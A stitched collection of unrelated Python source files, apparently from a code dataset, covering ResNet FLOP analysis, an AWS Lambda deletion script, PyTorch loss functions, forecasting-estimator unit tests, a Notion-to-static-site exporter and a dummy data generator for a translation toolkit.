print('Algorithmic Flops: {}\nWith specified dims: {}\n'.format(alg_flops, resolved_flops))
    # Calculate algorithmic Bytes accessed
alg_bytes = graph.calcAlgBytes()
resolved_bytes = alg_bytes.subs(bind_subs)
try:
resolved_bytes = int(resolved_bytes)
except:
print('ERROR: resolved_bytes should be int, but is {} = {}'.format(
type(resolved_bytes), resolved_bytes))
assert correct_bytes < 0 or resolved_bytes == correct_bytes, \
'Incorrect algorithmic bytes: {}'.format(resolved_bytes)
print('Alg bytes accessed: {}\nWith specified dims: {}\n'.format(alg_bytes, resolved_bytes))
# Calculate total memory footprint
alg_footprint = graph.calcAlgFootprint()
resolved_footprint = alg_footprint.subs(bind_subs)
try:
resolved_footprint = int(resolved_footprint)
except:
print('ERROR: resolved_footprint should be int, but is {} = {}'.format(
type(resolved_footprint), resolved_footprint))
assert correct_footprint < 0 or resolved_footprint == correct_footprint, \
'Incorrect algorithmic footprint: {}'.format(resolved_footprint)
print('Alg mem footprint: {}\nWith specified dims: {}\n'.format(alg_footprint, resolved_footprint))
# Calculate algorithmic IO per step
total_io_footprint = 0
for op in graph.getPlaceholders():
total_io_footprint += op.calcAlgFootprint()
resolved_io_footprint = total_io_footprint.subs(bind_subs)
print('Alg IO footprint: {}\nWith specified dims: {}\n'.format(total_io_footprint, resolved_io_footprint))
try: # In case the footprint code is not complete
# Calculate minimal memory footprint
print('Alg min mem footprint {}'.format(graph.calcMinFootprint(symbol_subs=bind_subs)))
except:
pass
if not is_pytest_run:
        print('VERBOSE ALGORITHMIC FLOPS:')
        graph.calcAlgFlops(verbose=True)
        print('')
        print('VERBOSE ALGORITHMIC BYTES:')
        graph.calcAlgBytes(verbose=True)
        print('')
        print('VERBOSE ALGORITHMIC FOOTPRINT:')
graph.calcAlgFootprint(verbose=True)
print('')
# HACKY WAY TO SAVE MODELS FOR NOW!
pickle.dump(graph, open('catamount/frameworks/example_graphs/tensorflow/full_models/image_classification/graph_image_resnet_d{}_fs{}.p'.format(depth, filter_scale), 'wb'))
if is_pytest_run:
return
print('\n\n======= Algorithmic graph-level analytics: =======')
feature_channel_dims = [32, 48, 64, 96, 128]
bind_subs.pop(feature_channels_symbol)
resolved_params = parameters.subs(bind_subs)
print('Symbol associations: {}\n'.format(bind_subs))
print('Algorithmic Flops by feature channels, params, and per-batch-sample:')
resolved_flops = alg_flops.subs(bind_subs)
for features_dim in feature_channel_dims:
graph_params = resolved_params.subs({feature_channels_symbol: features_dim})
graph_flops = resolved_flops.subs({feature_channels_symbol: features_dim})
graph_flops_per_sample = float(graph_flops) / \
bind_subs[subbatch_size_symbol]
print('{}\t{}\t{}\t{}'.format(features_dim, graph_params, graph_flops,
int(graph_flops_per_sample)))
print('\nAlgorithmic bytes accessed by feature channels, params:')
resolved_bytes = alg_bytes.subs(bind_subs)
for features_dim in feature_channel_dims:
graph_params = resolved_params.subs({feature_channels_symbol: features_dim})
graph_bytes = resolved_bytes.subs({feature_channels_symbol: features_dim})
print('{}\t{}\t{}'.format(features_dim, graph_params, graph_bytes))
print('\nAlgorithmic total memory footprint by feature channels, params:')
resolved_footprint = alg_footprint.subs(bind_subs)
for features_dim in feature_channel_dims:
graph_params = resolved_params.subs({feature_channels_symbol: features_dim})
graph_footprint = resolved_footprint.subs({feature_channels_symbol: features_dim})
print('{}\t{}\t{}'.format(features_dim, graph_params, graph_footprint))
print('\nAlgorithmic minimal memory footprint by feature channels, params:')
full_subs = dict(bind_subs)
for features_dim in feature_channel_dims:
graph_params = resolved_params.subs({feature_channels_symbol: features_dim})
full_subs[feature_channels_symbol] = features_dim
graph_min_foot = graph.calcMinimalFootprint(symbol_subs=full_subs)
print('{}\t{}\t{}'.format(features_dim, graph_params, graph_min_foot))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--depth', type=int, default=50, help='ResNet model size')
parser.add_argument('--filter_scale', type=float, default=1.0,
help='ResNet model filter scale')
args = parser.parse_args()
run_tf_image_resnet(depth=args.depth,
filter_scale=args.filter_scale)
| [
"sys.setrecursionlimit",
"argparse.ArgumentParser",
"os.path.join",
"catamount.api.utils.getPositiveIntSymbolFromString",
"sympy.Max",
"catamount.api.utils.getIntSymbolFromString",
"os.walk"
] | [((83, 111), 'sys.setrecursionlimit', 'sys.setrecursionlimit', (['(50000)'], {}), '(50000)\n', (104, 111), False, 'import sys\n'), ((1298, 1323), 'os.walk', 'os.walk', (['test_outputs_dir'], {}), '(test_outputs_dir)\n', (1305, 1323), False, 'import os\n'), ((2712, 2763), 'catamount.api.utils.getPositiveIntSymbolFromString', 'utils.getPositiveIntSymbolFromString', (['"""out_classes"""'], {}), "('out_classes')\n", (2748, 2763), False, 'from catamount.api import utils\n'), ((2791, 2844), 'catamount.api.utils.getPositiveIntSymbolFromString', 'utils.getPositiveIntSymbolFromString', (['"""subbatch_size"""'], {}), "('subbatch_size')\n", (2827, 2844), False, 'from catamount.api import utils\n'), ((2871, 2923), 'catamount.api.utils.getPositiveIntSymbolFromString', 'utils.getPositiveIntSymbolFromString', (['"""image_height"""'], {}), "('image_height')\n", (2907, 2923), False, 'from catamount.api import utils\n'), ((2949, 3000), 'catamount.api.utils.getPositiveIntSymbolFromString', 'utils.getPositiveIntSymbolFromString', (['"""image_width"""'], {}), "('image_width')\n", (2985, 3000), False, 'from catamount.api import utils\n'), ((3030, 3085), 'catamount.api.utils.getPositiveIntSymbolFromString', 'utils.getPositiveIntSymbolFromString', (['"""num_in_channels"""'], {}), "('num_in_channels')\n", (3066, 3085), False, 'from catamount.api import utils\n'), ((3111, 3155), 'catamount.api.utils.getIntSymbolFromString', 'utils.getIntSymbolFromString', (['"""graph::iters"""'], {}), "('graph::iters')\n", (3139, 3155), False, 'from catamount.api import utils\n'), ((3186, 3242), 'catamount.api.utils.getPositiveIntSymbolFromString', 'utils.getPositiveIntSymbolFromString', (['"""feature_channels"""'], {}), "('feature_channels')\n", (3222, 3242), False, 'from catamount.api import utils\n'), ((18451, 18476), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (18474, 18476), False, 'import argparse\n'), ((1537, 1565), 'os.path.join', 'os.path.join', (['root', 'filename'], {}), '(root, filename)\n', (1549, 1565), False, 'import os\n'), ((10605, 10620), 'sympy.Max', 'sympy.Max', (['x', 'y'], {}), '(x, y)\n', (10614, 10620), False, 'import sympy\n')] |
#!/usr/bin/env python3
# Copyright 2016 The Johns Hopkins University Applied Physics Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import boto3
import os
import sys
from lambdautils import create_session
def delete_func(session, name):
"""Delete the lambda function and all of its versions.
"""
client = session.client('lambda')
    resp = client.delete_function(FunctionName=name)
print(resp)
def setup_parser():
parser = argparse.ArgumentParser(
description='Script for deleting lambda functions. To supply arguments from a file, provide the filename prepended with an `@`.',
fromfile_prefix_chars = '@')
parser.add_argument(
'--aws-credentials', '-a',
metavar = '<file>',
default = os.environ.get('AWS_CREDENTIALS'),
type = argparse.FileType('r'),
help = 'File with credentials for connecting to AWS (default: AWS_CREDENTIALS)')
parser.add_argument(
'name',
help = 'Name of function.')
return parser
if __name__ == '__main__':
parser = setup_parser()
args = parser.parse_args()
if args.aws_credentials is None:
# This allows aws roles to be used to create sessions.
session = boto3.session.Session()
else:
session = create_session(args.aws_credentials)
delete_func(session, args.name)
| [
"argparse.FileType",
"boto3.session.Session",
"argparse.ArgumentParser",
"os.environ.get",
"lambdautils.create_session"
] | [((978, 1169), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Script for deleting lambda functions. To supply arguments from a file, provide the filename prepended with an `@`."""', 'fromfile_prefix_chars': '"""@"""'}), "(description=\n 'Script for deleting lambda functions. To supply arguments from a file, provide the filename prepended with an `@`.'\n , fromfile_prefix_chars='@')\n", (1001, 1169), False, 'import argparse\n'), ((1751, 1774), 'boto3.session.Session', 'boto3.session.Session', ([], {}), '()\n', (1772, 1774), False, 'import boto3\n'), ((1803, 1839), 'lambdautils.create_session', 'create_session', (['args.aws_credentials'], {}), '(args.aws_credentials)\n', (1817, 1839), False, 'from lambdautils import create_session\n'), ((1285, 1318), 'os.environ.get', 'os.environ.get', (['"""AWS_CREDENTIALS"""'], {}), "('AWS_CREDENTIALS')\n", (1299, 1318), False, 'import os\n'), ((1335, 1357), 'argparse.FileType', 'argparse.FileType', (['"""r"""'], {}), "('r')\n", (1352, 1357), False, 'import argparse\n')] |
import torch
import torch.nn as nn
import torch.nn.functional as F
LOGEPS = 1.e-6
def soft_dice_loss(logits, targets, smooth=1.0): # targets is one hot
probs = logits.softmax(dim=1)
n_classes = logits.shape[1]
loss = 0
for i_class in range(n_classes):
loss += dice_loss_perclass(probs[:,i_class], targets[:,i_class], smooth)
return loss / n_classes
def dice_loss_perclass(probs, targets, smooth=1.):
intersection = probs * targets.float()
return 1 - 2. * (intersection.sum()+smooth) / (probs.sum()+targets.sum()+smooth)
def soft_cross_entropy_loss(pred_logit, target):
log_pred = F.log_softmax(pred_logit, dim=-1)
loss = -(log_pred * target).mean()
return loss
def batch_det(input):
    return torch.cat([torch.unsqueeze(input[i].det(), dim=0) for i in range(input.shape[0])])
def gaussian_klloss(p_mu, p_sigma, q_mu, q_sigma):
# return average KLLoss on one sample
assert p_mu.shape == p_sigma.shape == q_mu.shape == q_sigma.shape
cov_p = torch.diag_embed(p_sigma)
q_sigma_inverse = 1 / q_sigma
q_cov_inverse = torch.diag_embed(q_sigma_inverse)
batch_dev_KLLoss = (torch.log(torch.prod(q_sigma, dim=-1) / torch.prod(p_sigma, dim=-1)) - p_mu.shape[-1] +
torch.sum(torch.diagonal(q_cov_inverse @ cov_p, dim1=-2, dim2=-1), dim=-1) +
((q_mu - p_mu).unsqueeze(dim=-2) @ q_cov_inverse @ (q_mu - p_mu).unsqueeze(dim=-1)).squeeze()) / 2
return torch.sum(batch_dev_KLLoss) / p_mu.shape[0], batch_dev_KLLoss
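# (added note) gaussian_klloss above implements the closed-form KL(P || Q) between
# diagonal Gaussians, treating p_sigma / q_sigma as the diagonals of the covariance
# matrices:
#   KL = 0.5 * [ log(det(Sig_q) / det(Sig_p)) - d + tr(Sig_q^-1 @ Sig_p)
#                + (mu_q - mu_p)^T Sig_q^-1 (mu_q - mu_p) ]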
def binary_cross_entropy_with_weights(output_P, target, positive_weights):
bceloss = - ((1 - positive_weights) * target * output_P.log() + positive_weights
* (1 - target) * (1 - output_P).log()).mean()
return bceloss
def confidence_loss(target, pred_logit, confidence, label):
log_pred = F.log_softmax(pred_logit, dim=-1)
ce_loss = -(log_pred * target).sum(dim=-1)
p_target = target[torch.arange(target.size(0)), label].clamp(LOGEPS, 1 - LOGEPS)
reject_loss = -torch.log(1 - p_target)
return ce_loss, reject_loss
def confidence_loss_v2(target, pred_logit, confidence, label):
log_pred = F.log_softmax(pred_logit, dim=-1)
ce_loss = -(log_pred * target).sum(dim=-1)
p_target = target[torch.arange(target.size(0)), label]
reject_loss = -(p_target * confidence.log() + (1 - p_target) * (1 - confidence).log())
return ce_loss, reject_loss
def confidence_loss_v3(target, pred_logit, confidence, label):
log_pred = F.log_softmax(pred_logit / (confidence * 10), dim=-1)
ce_loss = -(log_pred * target).sum(dim=-1)
reject_loss = torch.zeros(ce_loss.shape)
return ce_loss, reject_loss
def confidence_loss_v2_noCE(target, confidence, label, alpha, gamma):
p_target = target[torch.arange(target.size(0)), label]
conf_loss = -(alpha * p_target * (1 - confidence)**gamma * confidence.log() +
(1 - alpha) * (1 - p_target) * confidence**gamma * (1 - confidence).log())
return conf_loss
def confidence_loss_v2_noCE_CheX(target, confidence, label, alpha, gamma):
zero_label = (label == 0).to(torch.float32)
one_label = (label == 1).to(torch.float32)
# print(one_label)
confidence_target = zero_label * (1 - target) + one_label * target
conf_loss = -(alpha * confidence_target * (1 - confidence)**gamma * confidence.log() +
(1 - alpha) * (1 - confidence_target) * confidence**gamma * (1 - confidence).log())
return conf_loss
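# Illustrative smoke test (added; shapes and values are hypothetical, not taken
# from the original training code). Guarded so it only runs when executed directly.
if __name__ == "__main__":
    _logits = torch.randn(4, 3)  # (batch, n_classes)
    _onehot = F.one_hot(torch.randint(0, 3, (4,)), 3).float()
    print(soft_dice_loss(_logits, _onehot))
    print(soft_cross_entropy_loss(_logits, _onehot))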
| [
"torch.diagonal",
"torch.log",
"torch.prod",
"torch.sum",
"torch.nn.functional.log_softmax",
"torch.diag_embed",
"torch.zeros"
] | [((625, 658), 'torch.nn.functional.log_softmax', 'F.log_softmax', (['pred_logit'], {'dim': '(-1)'}), '(pred_logit, dim=-1)\n', (638, 658), True, 'import torch.nn.functional as F\n'), ((1011, 1036), 'torch.diag_embed', 'torch.diag_embed', (['p_sigma'], {}), '(p_sigma)\n', (1027, 1036), False, 'import torch\n'), ((1091, 1124), 'torch.diag_embed', 'torch.diag_embed', (['q_sigma_inverse'], {}), '(q_sigma_inverse)\n', (1107, 1124), False, 'import torch\n'), ((1856, 1889), 'torch.nn.functional.log_softmax', 'F.log_softmax', (['pred_logit'], {'dim': '(-1)'}), '(pred_logit, dim=-1)\n', (1869, 1889), True, 'import torch.nn.functional as F\n'), ((2178, 2211), 'torch.nn.functional.log_softmax', 'F.log_softmax', (['pred_logit'], {'dim': '(-1)'}), '(pred_logit, dim=-1)\n', (2191, 2211), True, 'import torch.nn.functional as F\n'), ((2523, 2576), 'torch.nn.functional.log_softmax', 'F.log_softmax', (['(pred_logit / (confidence * 10))'], {'dim': '(-1)'}), '(pred_logit / (confidence * 10), dim=-1)\n', (2536, 2576), True, 'import torch.nn.functional as F\n'), ((2643, 2669), 'torch.zeros', 'torch.zeros', (['ce_loss.shape'], {}), '(ce_loss.shape)\n', (2654, 2669), False, 'import torch\n'), ((2041, 2064), 'torch.log', 'torch.log', (['(1 - p_target)'], {}), '(1 - p_target)\n', (2050, 2064), False, 'import torch\n'), ((1473, 1500), 'torch.sum', 'torch.sum', (['batch_dev_KLLoss'], {}), '(batch_dev_KLLoss)\n', (1482, 1500), False, 'import torch\n'), ((1271, 1326), 'torch.diagonal', 'torch.diagonal', (['(q_cov_inverse @ cov_p)'], {'dim1': '(-2)', 'dim2': '(-1)'}), '(q_cov_inverse @ cov_p, dim1=-2, dim2=-1)\n', (1285, 1326), False, 'import torch\n'), ((1159, 1186), 'torch.prod', 'torch.prod', (['q_sigma'], {'dim': '(-1)'}), '(q_sigma, dim=-1)\n', (1169, 1186), False, 'import torch\n'), ((1189, 1216), 'torch.prod', 'torch.prod', (['p_sigma'], {'dim': '(-1)'}), '(p_sigma, dim=-1)\n', (1199, 1216), False, 'import torch\n')] |
import unittest
import numpy as np
import pandas as pd
from enda.estimators import EndaEstimatorWithFallback, EndaStackingEstimator, EndaNormalizedEstimator
from tests.test_utils import TestUtils
from enda.ml_backends.sklearn_estimator import EndaSklearnEstimator
try:
from sklearn.ensemble import AdaBoostRegressor, RandomForestRegressor
from sklearn.linear_model import LinearRegression
except ImportError as e:
raise ImportError("scikit-learn required")
class TestEndaEstimatorWithFallback(unittest.TestCase):
def test_1(self):
# read sample dataset from unittest files
train_set, test_set, target_name = TestUtils.read_example_a_train_test_sets()
        # remove some values of 'tso_forecast_load_mw' from the test_set on purpose
test_set.loc[test_set.index == '2020-09-20 00:30:00+02:00', 'tso_forecast_load_mw'] = np.NaN
test_set.loc[test_set.index >= '2020-09-23 23:15:00+02:00', 'tso_forecast_load_mw'] = np.NaN
# the dtype of the column should still be 'float64'
self.assertEqual('float64', str(test_set['tso_forecast_load_mw'].dtype))
m = EndaEstimatorWithFallback(
resilient_column='tso_forecast_load_mw',
estimator_with=EndaSklearnEstimator(AdaBoostRegressor()),
estimator_without=EndaSklearnEstimator(RandomForestRegressor())
)
m.train(train_set, target_name)
# print(m.predict_both(test_set, target_name))
prediction = m.predict(test_set, target_name)
# print(prediction)
# EndaEstimatorWithFallback performs a prediction even when 'tso_forecast_load_mw' was NaN
# check there is no NaN value in the prediction :
self.assertEqual(0, prediction[target_name].isna().sum())
class TestEndaStackingEstimator(unittest.TestCase):
def test_1(self):
train_set, test_set, target_name = TestUtils.read_example_a_train_test_sets()
m = EndaStackingEstimator(
base_estimators={
"ada": EndaSklearnEstimator(RandomForestRegressor()),
"rf": EndaSklearnEstimator(LinearRegression())
},
final_estimator=EndaSklearnEstimator(AdaBoostRegressor()),
base_stack_split_pct=0.10
)
m.train(train_set, target_name)
prediction = m.predict(test_set, target_name)
# print(prediction)
self.assertIsInstance(prediction.index, pd.DatetimeIndex)
self.assertTrue((test_set.index == prediction.index).all())
self.assertEqual(0, prediction[target_name].isna().sum())
# also check the underlying base predictions
base_predictions = m.predict_base_estimators(test_set, target_name)
# print(base_predictions)
self.assertListEqual(["ada", "rf"], list(base_predictions.columns))
class TestEndaNormalizedEstimator(unittest.TestCase):
def test_1(self):
train_set, test_set, target_name = TestUtils.read_example_a_train_test_sets()
m = EndaNormalizedEstimator(
inner_estimator=EndaSklearnEstimator(RandomForestRegressor()),
target_col="load_kw",
normalization_col="subscribed_power_kva",
columns_to_normalize=["contracts_count", "estimated_annual_consumption_kwh"]
)
m.train(train_set, target_name)
prediction = m.predict(test_set, target_name)
# print(prediction)
self.assertIsInstance(prediction.index, pd.DatetimeIndex)
self.assertTrue((test_set.index == prediction.index).all())
self.assertEqual(0, prediction[target_name].isna().sum())
| [
"tests.test_utils.TestUtils.read_example_a_train_test_sets",
"sklearn.ensemble.RandomForestRegressor",
"sklearn.linear_model.LinearRegression",
"sklearn.ensemble.AdaBoostRegressor"
] | [((643, 685), 'tests.test_utils.TestUtils.read_example_a_train_test_sets', 'TestUtils.read_example_a_train_test_sets', ([], {}), '()\n', (683, 685), False, 'from tests.test_utils import TestUtils\n'), ((1881, 1923), 'tests.test_utils.TestUtils.read_example_a_train_test_sets', 'TestUtils.read_example_a_train_test_sets', ([], {}), '()\n', (1921, 1923), False, 'from tests.test_utils import TestUtils\n'), ((2943, 2985), 'tests.test_utils.TestUtils.read_example_a_train_test_sets', 'TestUtils.read_example_a_train_test_sets', ([], {}), '()\n', (2983, 2985), False, 'from tests.test_utils import TestUtils\n'), ((1251, 1270), 'sklearn.ensemble.AdaBoostRegressor', 'AdaBoostRegressor', ([], {}), '()\n', (1268, 1270), False, 'from sklearn.ensemble import AdaBoostRegressor, RandomForestRegressor\n'), ((1324, 1347), 'sklearn.ensemble.RandomForestRegressor', 'RandomForestRegressor', ([], {}), '()\n', (1345, 1347), False, 'from sklearn.ensemble import AdaBoostRegressor, RandomForestRegressor\n'), ((2187, 2206), 'sklearn.ensemble.AdaBoostRegressor', 'AdaBoostRegressor', ([], {}), '()\n', (2204, 2206), False, 'from sklearn.ensemble import AdaBoostRegressor, RandomForestRegressor\n'), ((3073, 3096), 'sklearn.ensemble.RandomForestRegressor', 'RandomForestRegressor', ([], {}), '()\n', (3094, 3096), False, 'from sklearn.ensemble import AdaBoostRegressor, RandomForestRegressor\n'), ((2034, 2057), 'sklearn.ensemble.RandomForestRegressor', 'RandomForestRegressor', ([], {}), '()\n', (2055, 2057), False, 'from sklearn.ensemble import AdaBoostRegressor, RandomForestRegressor\n'), ((2103, 2121), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (2119, 2121), False, 'from sklearn.linear_model import LinearRegression\n')] |
from notion4ever import notion2json
from notion4ever import structuring
from notion4ever import site_generation
import logging
import json
from pathlib import Path
import shutil
import argparse
import os
from notion_client import Client
def main():
    parser = argparse.ArgumentParser(description=("Notion4ever: Export all your "
"notion content to markdown and html and serve it as static site."))
parser.add_argument('--notion_token', '-n',
type=str, help="Set your notion API token.",
default=os.environ.get("NOTION_TOKEN"))
parser.add_argument('--notion_page_id', '-p',
type=str, help="Set page_id of the target page.",
default=os.environ.get("NOTION_PAGE_ID"))
parser.add_argument('--output_dir', '-od',
type=str, default="./_site")
parser.add_argument('--templates_dir', '-td',
type=str, default="./_templates")
parser.add_argument('--sass_dir', '-sd',
type=str, default="./_sass")
parser.add_argument('--build_locally', '-bl',
type=bool, default=False)
parser.add_argument('--download_files', '-df',
type=bool, default=True)
parser.add_argument('--site_url', '-su',
type=str, default=os.environ.get("SITE_URL"))
parser.add_argument('--remove_before', '-rb',
type=bool, default=False)
parser.add_argument('--include_footer', '-if',
type=bool, default=False)
parser.add_argument('--logging_level', '-ll',
type=str, default="INFO")
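    # Example invocation (illustrative; the entry-point name is an assumption, but
    # the flag names match the parser defined above):
    #   python -m notion4ever --notion_token <token> --notion_page_id <page_id> \
    #       --output_dir ./_site --site_url https://example.github.io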
config = vars(parser.parse_args())
config["include_footer"] = os.environ.get("INCLUDE_FOOTER")
if config["logging_level"] == "DEBUG":
llevel = logging.DEBUG
else:
llevel = logging.INFO
logging.basicConfig(format="%(asctime)s %(levelname)s: %(message)s",
level=llevel)
if config["remove_before"]:
if Path(config["output_dir"]).exists():
shutil.rmtree(config["output_dir"])
logging.debug("🤖 Removed old site files")
notion = Client(auth=config["notion_token"])
logging.info("🤖 Notion authentification completed successfully.")
# It will rewrite this file
raw_notion = {}
filename = "./notion_content.json"
filename_structured = "./notion_structured.json"
    # Stage 1. Download (read) the raw notion content and save it to a json file
if Path(filename).exists():
logging.info("🤖 Reading existing raw notion content.")
with open(filename, "r") as f:
raw_notion = json.load(f)
else:
logging.info("🤖 Started raw notion content parsing.")
notion2json.notion_page_parser(config["notion_page_id"],
notion=notion,
filename=filename,
notion_json=raw_notion)
logging.info(f"🤖 Downloaded raw notion content. Saved at {filename}")
# Stage 2. Structuring data
logging.info(f"🤖 Started structuring notion data")
structured_notion = structuring.structurize_notion_content(raw_notion,
config)
with open(filename_structured, "w+", encoding="utf-8") as f:
json.dump(structured_notion, f, ensure_ascii=False, indent=4)
logging.info(f"🤖 Finished structuring notion data")
if Path(filename_structured).exists():
logging.info("🤖 Reading existing raw notion content.")
with open(filename_structured, "r") as f:
structured_notion = json.load(f)
# Stage 3. Generating site from template and data
if config["build_locally"]:
structured_notion['base_url'] = \
str(Path(config["output_dir"]).resolve())
else:
structured_notion['base_url'] = config["site_url"]
logging.info(("🤖 Started generating site "
f"{'locally' if config['build_locally'] else ''} "
f"to {config['output_dir']}"))
site_generation.generate_site(structured_notion, config)
logging.info("🤖 Finished generating site.")
if __name__ == "__main__":
main() | [
"logging.basicConfig",
"notion4ever.site_generation.generate_site",
"logging.debug",
"argparse.ArgumentParser",
"pathlib.Path",
"notion4ever.notion2json.notion_page_parser",
"os.environ.get",
"notion_client.Client",
"notion4ever.structuring.structurize_notion_content",
"shutil.rmtree",
"json.load",
"logging.info",
"json.dump"
] | [((265, 406), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Notion4ever: Export all yournotion content to markdown and html and serve it as static site."""'}), "(description=\n 'Notion4ever: Export all yournotion content to markdown and html and serve it as static site.'\n )\n", (288, 406), False, 'import argparse\n'), ((1581, 1613), 'os.environ.get', 'os.environ.get', (['"""INCLUDE_FOOTER"""'], {}), "('INCLUDE_FOOTER')\n", (1595, 1613), False, 'import os\n'), ((1738, 1825), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(asctime)s %(levelname)s: %(message)s"""', 'level': 'llevel'}), "(format='%(asctime)s %(levelname)s: %(message)s', level=\n llevel)\n", (1757, 1825), False, 'import logging\n'), ((2039, 2074), 'notion_client.Client', 'Client', ([], {'auth': "config['notion_token']"}), "(auth=config['notion_token'])\n", (2045, 2074), False, 'from notion_client import Client\n'), ((2079, 2144), 'logging.info', 'logging.info', (['"""🤖 Notion authentification completed successfully."""'], {}), "('🤖 Notion authentification completed successfully.')\n", (2091, 2144), False, 'import logging\n'), ((2951, 3001), 'logging.info', 'logging.info', (['f"""🤖 Started structuring notion data"""'], {}), "(f'🤖 Started structuring notion data')\n", (2963, 3001), False, 'import logging\n'), ((3026, 3084), 'notion4ever.structuring.structurize_notion_content', 'structuring.structurize_notion_content', (['raw_notion', 'config'], {}), '(raw_notion, config)\n', (3064, 3084), False, 'from notion4ever import structuring\n'), ((3285, 3336), 'logging.info', 'logging.info', (['f"""🤖 Finished structuring notion data"""'], {}), "(f'🤖 Finished structuring notion data')\n", (3297, 3336), False, 'import logging\n'), ((3800, 3925), 'logging.info', 'logging.info', (['f"""🤖 Started generating site {\'locally\' if config[\'build_locally\'] else \'\'} to {config[\'output_dir\']}"""'], {}), '(\n f"🤖 Started generating site {\'locally\' if config[\'build_locally\'] else \'\'} to {config[\'output_dir\']}"\n )\n', (3812, 3925), False, 'import logging\n'), ((3964, 4020), 'notion4ever.site_generation.generate_site', 'site_generation.generate_site', (['structured_notion', 'config'], {}), '(structured_notion, config)\n', (3993, 4020), False, 'from notion4ever import site_generation\n'), ((4026, 4069), 'logging.info', 'logging.info', (['"""🤖 Finished generating site."""'], {}), "('🤖 Finished generating site.')\n", (4038, 4069), False, 'import logging\n'), ((2412, 2466), 'logging.info', 'logging.info', (['"""🤖 Reading existing raw notion content."""'], {}), "('🤖 Reading existing raw notion content.')\n", (2424, 2466), False, 'import logging\n'), ((2562, 2615), 'logging.info', 'logging.info', (['"""🤖 Started raw notion content parsing."""'], {}), "('🤖 Started raw notion content parsing.')\n", (2574, 2615), False, 'import logging\n'), ((2624, 2742), 'notion4ever.notion2json.notion_page_parser', 'notion2json.notion_page_parser', (["config['notion_page_id']"], {'notion': 'notion', 'filename': 'filename', 'notion_json': 'raw_notion'}), "(config['notion_page_id'], notion=notion,\n filename=filename, notion_json=raw_notion)\n", (2654, 2742), False, 'from notion4ever import notion2json\n'), ((2844, 2913), 'logging.info', 'logging.info', (['f"""🤖 Downloaded raw notion content. Saved at {filename}"""'], {}), "(f'🤖 Downloaded raw notion content. 
Saved at {filename}')\n", (2856, 2913), False, 'import logging\n'), ((3218, 3279), 'json.dump', 'json.dump', (['structured_notion', 'f'], {'ensure_ascii': '(False)', 'indent': '(4)'}), '(structured_notion, f, ensure_ascii=False, indent=4)\n', (3227, 3279), False, 'import json\n'), ((3393, 3447), 'logging.info', 'logging.info', (['"""🤖 Reading existing raw notion content."""'], {}), "('🤖 Reading existing raw notion content.')\n", (3405, 3447), False, 'import logging\n'), ((528, 558), 'os.environ.get', 'os.environ.get', (['"""NOTION_TOKEN"""'], {}), "('NOTION_TOKEN')\n", (542, 558), False, 'import os\n'), ((685, 717), 'os.environ.get', 'os.environ.get', (['"""NOTION_PAGE_ID"""'], {}), "('NOTION_PAGE_ID')\n", (699, 717), False, 'import os\n'), ((1222, 1248), 'os.environ.get', 'os.environ.get', (['"""SITE_URL"""'], {}), "('SITE_URL')\n", (1236, 1248), False, 'import os\n'), ((1935, 1970), 'shutil.rmtree', 'shutil.rmtree', (["config['output_dir']"], {}), "(config['output_dir'])\n", (1948, 1970), False, 'import shutil\n'), ((1983, 2024), 'logging.debug', 'logging.debug', (['"""🤖 Removed old site files"""'], {}), "('🤖 Removed old site files')\n", (1996, 2024), False, 'import logging\n'), ((2379, 2393), 'pathlib.Path', 'Path', (['filename'], {}), '(filename)\n', (2383, 2393), False, 'from pathlib import Path\n'), ((2531, 2543), 'json.load', 'json.load', (['f'], {}), '(f)\n', (2540, 2543), False, 'import json\n'), ((3349, 3374), 'pathlib.Path', 'Path', (['filename_structured'], {}), '(filename_structured)\n', (3353, 3374), False, 'from pathlib import Path\n'), ((3530, 3542), 'json.load', 'json.load', (['f'], {}), '(f)\n', (3539, 3542), False, 'import json\n'), ((1886, 1912), 'pathlib.Path', 'Path', (["config['output_dir']"], {}), "(config['output_dir'])\n", (1890, 1912), False, 'from pathlib import Path\n'), ((3688, 3714), 'pathlib.Path', 'Path', (["config['output_dir']"], {}), "(config['output_dir'])\n", (3692, 3714), False, 'from pathlib import Path\n')] |
#!/usr/bin/env python
# Generates dummy data for testing
from rtg.data.dataset import Batch, Example
import argparse
from rtg import log, TranslationExperiment as Experiment
from rtg.utils import IO
from rtg.data.dataset import LoopingIterable
import numpy as np
from pathlib import Path
from typing import Optional, Dict, Union, Any
class BatchIterable:
# TODO: How to specify Type Hint for this as Iterable[Batch]
"""Dummy equivalent of dataprep.BatchIterable"""
def __init__(self, vocab_size, batch_size, n_batches, min_seq_len=5, max_seq_len=20,
n_reserved_toks=Batch.eos_val + 1, reverse=True, batch_first=False):
"""
"Generate random data for a src-tgt copy task."
:param vocab_size: Vocabulary size
:param batch_size:
:param n_batches: number of batches to produce
:param n_reserved_toks: number of reserved tokens (such as pad, EOS, BOS, UNK etc)
:param reverse: reverse the target
:param batch_first: first dimension is batch
:return:
"""
self.vocab_size = vocab_size
self.batch_size = batch_size
self.num_batches = n_batches
self.min_seq_len = min_seq_len
self.max_seq_len = max_seq_len
self.n_reserved_toks = n_reserved_toks
self.reverse = reverse
self.batch_first = batch_first
def make_an_ex(self):
seq_len = np.random.randint(self.min_seq_len, self.max_seq_len)
data = np.random.randint(self.n_reserved_toks, self.vocab_size, size=(seq_len,))
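        # When reversing, each token t is mapped to (vocab_size + n_reserved_toks - 1) - t,
        # which mirrors the id range [n_reserved_toks, vocab_size) onto itself.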
tgt = self.vocab_size + (self.n_reserved_toks - 1) - data if self.reverse else data
return Example(data.tolist(), tgt.tolist())
def __iter__(self):
for i in range(self.num_batches):
exs = [self.make_an_ex() for _ in range(self.batch_size)]
yield Batch(exs, sort_dec=True, batch_first=self.batch_first)
class DummyExperiment(Experiment):
"""
A dummy experiment for testing;
this produces random data and leaves no trace on disk
"""
def __init__(self, work_dir: Union[str, Path], read_only=True,
